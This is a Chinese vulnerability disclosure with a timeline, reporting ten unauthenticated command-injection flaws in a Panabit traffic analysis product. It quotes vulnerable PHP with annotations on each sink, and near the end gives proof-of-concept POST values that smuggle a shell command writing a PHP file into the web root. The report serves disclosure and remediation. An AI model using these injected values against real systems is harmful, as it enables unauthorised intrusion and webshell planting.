2016-03-11: 细节已通知厂商并且等待厂商处理中 2016-03-15: 厂商已经确认,细节仅向厂商公开 2016-03-18: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息) 2016-05-09: 细节向核心白帽子及相关领域专家公开 2016-05-19: 细节向普通白帽子公开 2016-05-29: 细节向实习白帽子公开 2016-06-13: 细节向公众公开
Panabit某流量分析管理系统十处命令执行(无需登录)
全部打包了只求全rank哇官网案例:http://**.**.**.**/html/solution/success_case/2014/0903/82.html 可以看到此厂商面对的客户都是一些运营商 高校 企业 小区 网吧用户规模是非常大第一 二 三 四处:根目录下的fetionlist.php qqlist.php sinawblist.php taobaolist.php
..... 关键代码
// Every parameter is read straight from $_POST with no validation or
// normalisation; most of them are interpolated into a shell command below.
$devid = $_POST['devid'];
$ipaddr = $_POST['ipaddr'];
$qqnumber = $_POST['qqnumber'];
$strstart = $_POST['starttime'];
$strend = $_POST['endtime'];
$topn = $_POST['topn'];
$account = $_POST['account'];
// Plain string concatenation: 'errname' is not reduced to a bare file name
// (no basename()), so the resulting path is not confined to _CHECKING_STATUS_F.
$errfile = _CHECKING_STATUS_F.'/'.$_POST['errname'];
$bexport = $_POST['bexport'];
$eventtype = $_POST['eventtype'];
// Export format selects the output file extension; anything else yields "none".
if ($bexport == 1) $filename = date("YmdHis").".xls";
else if ($bexport == 2) $filename = date("YmdHis").".txt";
else if ($bexport == 3) $filename = date("YmdHis").".csv";
else $filename = "none";
// strtotime() returns false for unparseable input; a false interpolates into
// the command string below as an empty token.
$longstart = strtotime($strstart);
$longend = strtotime($strend);
// Empty values become the literal sentinel "none". $ipaddr is the only value
// that gets normalised (ip2long() yields an int, or false -> "" for an invalid
// address); $qqnumber and $account are passed through verbatim.
if ($ipaddr == "") $ipaddr = "none";
else $ipaddr = ip2long($ipaddr);
if ($qqnumber == "") $qqnumber = "none";
if ($account == "") $account = "none";
// Table range: midnight of the start day minus one day, up to $longend.
$tbstart = explode(' ', $strstart);
$tbstarts = $tbstart[0]." 00:00:00";
$slong = strtotime($tbstarts) - 24*3600;
$elong = $longend;
$tablestr = $slong."/".$elong;
$k = 0;
$result = array();
$res = array();
$link = $filename;
$tablefile = php_getfetiontable($strstart, $strend);
// Command-injection sink: $devid, $qqnumber, $account, $bexport, $topn and
// $eventtype (plus $errfile built from 'errname') reach the shell unquoted.
// Each argument should be validated against an allowlist (e.g. ctype_digit()
// for numeric ids) and/or wrapped with escapeshellarg() before interpolation.
$cmd = LOGDPATH."/bin/logeye fetionlist $devid $ipaddr $qqnumber $account $longstart $longend $tablefile $bexport $filename $errfile $topn $eventtype";
exec($cmd, $output, $return);
这四处关键部分大概内容都差不多。四处变量 $devid、$ipaddr、$qqnumber、$account 无防护传给 $cmd,$cmd 直接进入 exec() 函数导致命令执行。
第五、六处:\Maintain\createappgraph.php、\Maintain\createipgraph.php
// Chart parameters straight from $_POST; nothing is validated before they are
// used in a SQL query and a shell command below.
$devid = $_POST['devid'];
$strstart = $_POST['tmstart'];
$strend = $_POST['tmend'];
$topapp = $_POST['topapp'];
$linkid = $_POST['linkid'];
$appname = $_POST['appname'];
// Resolve the display name (cname) to the internal application name.
// NOTE(review): $appname is interpolated into the SQL string unescaped, and the
// mysql_* extension itself was removed in PHP 7 — a prepared statement via
// PDO/mysqli is the replacement. The resolved $appname is not used by the
// command shown at the end of this excerpt.
$conn = mysql_connect(MYSQL_HOST, MYSQL_USER, MYSQL_PASS);
mysql_query("set names 'utf8'");
$result = mysql_query("select name from palog.axp where cname = '$appname'");
if (mysql_num_rows($result) != 0){
    $row = mysql_fetch_row($result);
    $appname = $row[0];
}
mysql_close();
// strtotime() yields false on unparseable input, which interpolates as "".
$longstart = strtotime($strstart);
$longend = strtotime($strend);
// Table range: 30 minutes before midnight of the start day, up to $longend.
$tbstart = explode(' ', $strstart);
$tbstarts = $tbstart[0]." 00:00:00";
$slong = strtotime($tbstarts)-30*60;
$elong = $longend;
$tables = $slong."/".$elong;
// Pick a binary unit for a byte count. Returns the unit letter (G/M/K/B) when
// $u == 'units', otherwise the divisor that converts $values into that unit.
function formatdata($values, $u){
    if ($values > 1024*1024*1024){
        $units = 'G';
        $div = 1024*1024*1024;
    } else if ($values > 1024*1024){
        $units = 'M';
        $div = 1024*1024;
    } else if ($values > 1024){
        $units = 'K';
        $div = 1024;
    }else {
        $units = 'B';
        $div = 1;
    }
    if ($u == 'units') return $units;
    else return $div;
}
$labels = array();
$values = array();
$chart = new VerticalBarChart(1100, 300);
$dataSet = new XYDataSet();
// Command-injection sink: $devid, $topapp and $linkid reach the shell unquoted
// (the other tokens are derived from strtotime()). Validate each against an
// allowlist or pass it through escapeshellarg().
// NOTE(review): this uses a Windows-style path (logeye.exe under DOCROOT) while
// the other scripts call LOGDPATH."/bin/logeye" — presumably a Windows build;
// confirm which platform this file targets.
exec(DOCROOT."\\bin\\logeye.exe apptop $devid $longstart $longend $tables $topapp appup $linkid", $output, $return);
Maintain 为后台目录,但是没有验证权限,导致未授权访问。这两处关键部分大概内容都差不多,三处变量 $devid、$linkid、$topapp 未过滤进入 exec() 函数导致命令执行。
第七、八处:\Maintain\exportpdf.php、\Maintain\exportpdf_cgi.php
// Report parameters straight from $_POST; $devid, $ip, $top and 'errname' are
// used below in shell commands and a file path without validation.
$devid = $_POST['devid'];
$ip = $_POST['ip'];
$strstart = $_POST['tmstart'];
$strend = $_POST['tmend'];
$top = $_POST['top'];
// Plain concatenation: 'errname' is not reduced to a bare file name, so the
// path is not confined to _CHECKING_STATUS_F.
$errfile = _CHECKING_STATUS_F.'/'.$_POST['errname'];
// Empty $ip means "all addresses": the default is an address range (redacted
// in this listing).
if ($ip == "") $ip = "**.**.**.**-**.**.**.**";
// strtotime() yields false on unparseable input, which interpolates as "".
$longstart = strtotime($strstart);
$longend = strtotime($strend);
// Table range: three hours before midnight of the start day, up to $longend.
$tbstart = explode(' ', $strstart);
$tbstarts = $tbstart[0]." 00:00:00";
$slong = strtotime($tbstarts)-6*30*60;
$elong = $longend;
$tables = $slong."/".$elong;
// Cover page: title, date, logo, creator, device id, period, generation time.
$pdf=new PDF('P', 'mm', 'A4');
$pdf->Open();
$pdf->SetMargins(5, 5, 5);
$pdf->AddPage();
$pdf->SetDisplayMode('real');
$pdf->AddGBFont();
$pdf->SetFont('GB', 'B', 25);
$pdf->SetXY(57, 70);
$pdf->Cell(40,10, '流控日志管理系统报表');
$pdf->Ln();
$pdf->SetX(80);
$pdf->Cell(40,10,'('.date('Y/m/d').')');
$pdf->Ln();
// $doc is expected to be defined by the surrounding script (not shown here).
$pdf->Image($doc.'/img/logo.jpg', 75, 90, 50, 15);
$pdf->SetFont('GB', '', 14);
$pdf->Ln(50);
$pdf->SetX(60);
$pdf->Cell(40, 10, '创建用户:');
// Creator name is taken from a client cookie, i.e. client-controlled text.
$pdf->Cell(40, 10, $_COOKIE['c_username']);
$pdf->Ln();
$pdf->SetX(60);
$pdf->Cell(40, 10, '流控设备编号:');
// Device id 0 means "all devices". Loose comparison: how non-numeric strings
// compare against 0 differs between PHP 7 and PHP 8.
if ($devid == 0) $pdf->Cell(40, 10, "所有设备");
else $pdf->Cell(40,10, $devid);
$pdf->Ln();
$pdf->SetX(60);
$pdf->Cell(40, 10, '统计时间段:');
$pdf->Cell(40, 10, date('Y/m/d H:i', $longstart).'-'.date('Y/m/d H:i', $longend));
$pdf->Ln();
$pdf->SetX(60);
$pdf->Cell(40, 10, '报表生成时间:');
$pdf->Cell(40, 10, date('Y/m/d H:i'), 0,1,'L',false);
// Column widths (mm) for the per-user table and bar colours for the chart.
$dwidth = array(10, 28, 18, 18, 18, 18, 18, 18, 18, 18, 18);
$arcolors = array("#068BC5","#4EB133","#E6561C","#E6EB01","#24C8E3","#62E172","#F7EE64","#69F5C3","#ACDBFD","#C6C9CA", "#F68F67","#CDE577","#710000","#5D584B","#4572A7");
$pdf->AddPage();
$tablefile = php_getiptable($strstart, $strend, $devid);
// Command-injection sink (1 of 2): $devid, $ip, $top and $errfile reach the
// shell unquoted. Validate each against an allowlist (FILTER_VALIDATE_IP for
// addresses, ctype_digit() for counts/ids) or wrap it with escapeshellarg().
exec(LOGDPATH."/bin/logeye iptop $devid $ip $longstart $longend $tablefile $top total $errfile", $output, $return);
// Each output line is split on spaces. From the indexing used below:
//   [0] address, [1] total bytes, [2] up bytes, [3] down bytes,
//   [6]/[7] peak up/down, [8] and [9] divisors (durations?) for the rates
// — inferred from usage; confirm against logeye's actual output format.
$xlabels = array();
$yvalues = array();
foreach($output as $key=>$val){
    $ds = explode(' ', $val);
    // Skip the placeholder address (redacted in this listing).
    if ($ds[0] == "**.**.**.**") continue;
    array_push($xlabels, $ds[0]);
    // Total bytes -> decimal megabytes for the chart.
    array_push($yvalues, (double)$ds[1] / 1000 / 1000);
}
if (count($yvalues) != 0) {
    $graph = new Graph(1000,300,'auto');
    $graph->SetScale("textlin");
    $graph->img->SetMargin(50,50,10,100);
    $graph->title->SetFont(FF_SIMSUN, FS_NORMAL);
    $graph->xaxis->SetFont(FF_SIMSUN, FS_NORMAL);
    $graph->title->Set("(单位:M)");
    $graph->ygrid->SetFill(false);
    $graph->xaxis->SetLabelAngle(50);
    $graph->xaxis->SetTickLabels($xlabels);
    $graph->yaxis->HideLine(false);
    $graph->yaxis->HideTicks(false,false);
    $bplot = new BarPlot($yvalues);
    $bplot->SetFillColor($arcolors);
    $graph->Add($bplot);
    // The chart is rendered to a fixed file name and embedded; the unlink() that
    // would remove it afterwards is commented out, so the file persists and is
    // overwritten by concurrent requests.
    $graph->Stroke($doc."/download/iptotal.png");
    $pdf->SetFont('GB', 'B', 14);
    $pdf->Cell(40, 10, '用户统计');
    $pdf->Ln();
    $pdf->Ln();
    $pdf->Image($doc.'/download/iptotal.png', $pdf->GetX(), $pdf->GetY(), 200, 80);
    //unlink($doc.'/download/iptotal.png');
    $pdf->Ln();
    // Two-row table header: each group cell is drawn with ln=2 (cursor moves
    // below it), its three sub-cells follow, then the cursor is moved back up
    // 7mm so the next group starts on the top row.
    $pdf->SetY(110);
    $pdf->SetFillColor(58,110,165);
    $pdf->SetTextColor(255, 255,255);
    $pdf->SetFont('GB', 'B', 10);
    $pdf->Cell(10, 14, "序号", 1, 0, 'C', true);
    $pdf->Cell(28, 14, "用户", 1, 0, 'C', true);
    $pdf->Cell(54, 7, "流量(字节)", 1, 2, 'C', true);
    $pdf->Cell(18, 7, "上行", 1, 0, 'C', true);
    $pdf->Cell(18, 7, "下行", 1, 0, 'C', true);
    $pdf->Cell(18, 7, "总", 1, 0, 'C', true);
    $pdf->SetXY($pdf->GetX(), $pdf->GetY()-7);
    $pdf->Cell(54, 7, "平均速率(bps)", 1, 2, 'C', true);
    $pdf->Cell(18, 7, "上行", 1, 0, 'C', true);
    $pdf->Cell(18, 7, "下行", 1, 0, 'C', true);
    $pdf->Cell(18, 7, "总", 1, 0, 'C', true);
    $pdf->SetXY($pdf->GetX(), $pdf->GetY()-7);
    $pdf->Cell(54, 7, "峰值速率(bps)", 1, 2, 'C', true);
    $pdf->Cell(18, 7, "上行", 1, 0, 'C', true);
    $pdf->Cell(18, 7, "下行", 1, 0, 'C', true);
    $pdf->Cell(18, 7, "总", 1, 0, 'C', true);
    $pdf->Ln();
    $pdf->SetTextColor(0, 0,0);
    // One row per output line. $key is the index in $output, so row numbers
    // keep a gap wherever the placeholder line was skipped.
    // NOTE(review): $ds[8] and $ds[9] are used as divisors without a zero
    // check — a "0" field is a warning/INF on PHP 7 and a DivisionByZeroError
    // on PHP 8.
    foreach($output as $key=>$val){
        $ds = explode(' ', $val);
        if ($ds[0] == "**.**.**.**") continue;
        $pdf->Cell($dwidth[0], 7, $key+1, 1, 0, 'C');
        $pdf->Cell($dwidth[1], 7, $ds[0], 1, 0, 'C');
        $pdf->Cell($dwidth[2], 7, dataformat((double)$ds[2]), 1, 0, 'C');
        $pdf->Cell($dwidth[3], 7, dataformat((double)$ds[3]), 1, 0, 'C');
        $pdf->Cell($dwidth[4], 7, dataformat((double)$ds[1]), 1, 0, 'C');
        $pdf->Cell($dwidth[5], 7, dataformat((double)$ds[2]*8/$ds[8]), 1, 0, 'C');
        $pdf->Cell($dwidth[6], 7, dataformat((double)$ds[3]*8/$ds[8]), 1, 0, 'C');
        $pdf->Cell($dwidth[7], 7, dataformat((double)$ds[1]*8/$ds[8]), 1, 0, 'C');
        $pdf->Cell($dwidth[8], 7, dataformat((double)$ds[6]*8/$ds[9]), 1, 0, 'C');
        $pdf->Cell($dwidth[9], 7, dataformat((double)$ds[7]*8/$ds[9]), 1, 0, 'C');
        $pdf->Cell($dwidth[10], 7, dataformat(((double)$ds[6]+(double)$ds[7])*8/$ds[9]), 1, 0, 'C');
        $pdf->Ln();
    }
    $pdf->AddPage();
    unset($output);
    unset($xlabels);
    unset($yvalues);
}else {
    // No usable rows: report and stop before the per-application section.
    outputres("no", "noip");
    exit;
}
$tablefile = php_getapptable($strstart, $strend);
// Command-injection sink (2 of 2): same unquoted $devid, $top and $errfile.
exec(LOGDPATH."/bin/logeye apptop $devid $longstart $longend $tablefile $top total 0 $errfile", $output, $return);
这两处关键部分大概内容都差不多,变量 $devid、$top 未过滤进入 exec() 函数导致命令执行。
第九处:\Maintain\ifadmin.php
<?php
$doc = $_SERVER['DOCUMENT_ROOT'];
include("$doc/common.php");
// NOTE(review): nothing in this file checks the caller's session or role;
// unless common.php does so, this endpoint is reachable without login.
// Interface settings straight from $_POST; they are written into /etc/rc.conf
// and interpolated into ifconfig/route commands below without validation.
$ifadmin = $_POST['ifadmin'];
$ipaddr = $_POST['ipaddr'];
$netmask = $_POST['netmask'];
$gateway = $_POST['gateway'];
// Parse the current ifconfig_<if>="inet A netmask M" and defaultrouter="G"
// lines out of rc.conf. The $ori_* variables stay undefined if those lines
// are absent, and the comparison below then raises notices.
$confl = array();
$confl = file("/etc/rc.conf");
foreach($confl as $val){
    if (strstr($val, "ifconfig") !== false){
        $ds = explode('=', $val);
        $ifconfig = $ds[0];
        $ipstr = $ds[1];
        $ds1 = explode('_', $ifconfig);
        // Parsed but never used below.
        $ori_ifadmin = $ds1[1];
        $ds2 = explode(' ', $ipstr);
        $ori_ipaddr = $ds2[1];
        $ori_netmask = trim($ds2[3], "\"\n\r");
    }
    if (strstr($val, "defaultrouter") !== false){
        $ds = explode('=', $val);
        $ori_gateway = trim($ds[1], "\"\n\r");
    }
}
// Unchanged settings: report success without touching anything.
if ($ipaddr == $ori_ipaddr && $netmask == $ori_netmask && $gateway == $ori_gateway) outputres("yes", "操作成功");
else{
    // Rewrite rc.conf line by line, replacing the ifconfig and defaultrouter
    // entries. fopen(..., "w") truncates the file before anything is written,
    // so a failure part-way leaves it incomplete; there is no backup or
    // write-to-temp-and-rename.
    $confl = array();
    $confl = file("/etc/rc.conf");
    $fp = fopen("/etc/rc.conf", "w");
    foreach($confl as $val){
        if (strstr($val, "ifconfig") !== false){
            // The interface name comes from the request, not from the line
            // being replaced, and all values are written unquoted.
            fwrite($fp, "ifconfig_$ifadmin=\"inet $ipaddr netmask $netmask\"\n");
            continue;
        }
        if (strstr($val, "defaultrouter") !== false){
            fwrite($fp, "defaultrouter=\"$gateway\"\n");
            continue;
        }
        fwrite($fp, $val);
    }
    fclose($fp);
    // Command-injection sink: all four request values reach the shell unquoted.
    // Validate first (filter_var(..., FILTER_VALIDATE_IP) for address/mask/
    // gateway, an allowlist of known interface names for $ifadmin) and wrap
    // each argument with escapeshellarg(). Return values are not checked.
    exec("ifconfig $ifadmin $ipaddr netmask $netmask");
    exec("route add default $gateway");
    outputres("yes", "操作成功");
}
?>
变量 $ifadmin、$ipaddr、$netmask 未过滤,导致命令执行。
第十处:\Maintain\zpool_set.php
// $type is set outside this excerpt (presumably from the request — confirm).
// Only systems installed from the newer ISO have install_device; bail otherwise.
if (!file_exists("/usr/logd/bin/install_device")){
    outputres("no", "对不起,此功能在最新ISO安装的系统上有效");
    exit(0);
}
if ($type == "add"){
    // Device to add comes straight from $_POST and is interpolated into the
    // zpool command below unquoted (command-injection sink). Validate it
    // against an allowlist of device paths or pass it through escapeshellarg().
    $add = $_POST['add'];
    // Pool presence is inferred from df output. Only exit status 1 is treated
    // as "missing"; any other non-zero status (e.g. grep's 2 on error) falls
    // through as if the pool existed.
    exec("df -h | grep mylog", $output, $ret);
    if ($ret == 1){
        outputres("no", "zpool mylog is not exists!");
        exit(0);
    }
    // -f forces the add. exec() appends to the existing $output array, so
    // $output[0] below is the df line, not zpool's message.
    exec("zpool add -f mylog $add", $output, $ret);
    if ($ret == 1){
        outputres("no", $output[0]);
        exit(0);
    }
    outputres("yes", "");
}
if ($type == "replace"){
    // Both device names come straight from $_POST and reach the shell unquoted
    // (command-injection sink); same validation/escaping applies.
    $repla = $_POST['repla'];
    $new_repla = $_POST['new_repla'];
    // Same exit-code caveat as above: only status 1 counts as "missing".
    exec("df -h | grep mylog", $output, $ret);
    if ($ret == 1){
        outputres("no", "zpool mylog is not exists!");
        exit(0);
    }
    // $output still holds the df line(s), so $output[0] is not zpool's output.
    exec("zpool replace -f mylog $repla $new_repla", $output, $ret);
    if ($ret == 1){
        outputres("no", $output[0]);
        exit(0);
    }
    outputres("yes", "");
}
变量 $add、$repla 未过滤,导致命令执行。
这么多处,随便拿两处来说吧第四处证明拿一处来说**.**.**.**/qqlist.phppostdata:devid=1&ipaddr=**.**.**.**&account=xx;echo 1111>/usr/logd/www/1111.php执行完会在根目录生成一个1111.php的文件
第二处后台证明:**.**.**.**/Maintain/exportpdf.php postdata:devid=11;echo xxxxxxx>/usr/logd/www/223.php
后台其它文件也是同理会执行成功
交给厂商
危害等级:高
漏洞Rank:16
确认时间:2016-03-15 17:01
CNVD未直接复现所述情况,已由CNVD通过软件生产厂商公开联系渠道向其邮件通报,由其后续提供解决方案并协调相关用户单位处置。
暂无
@牛肉包子 我竟无言以对,咋可能
可以
@king7 求带
已修正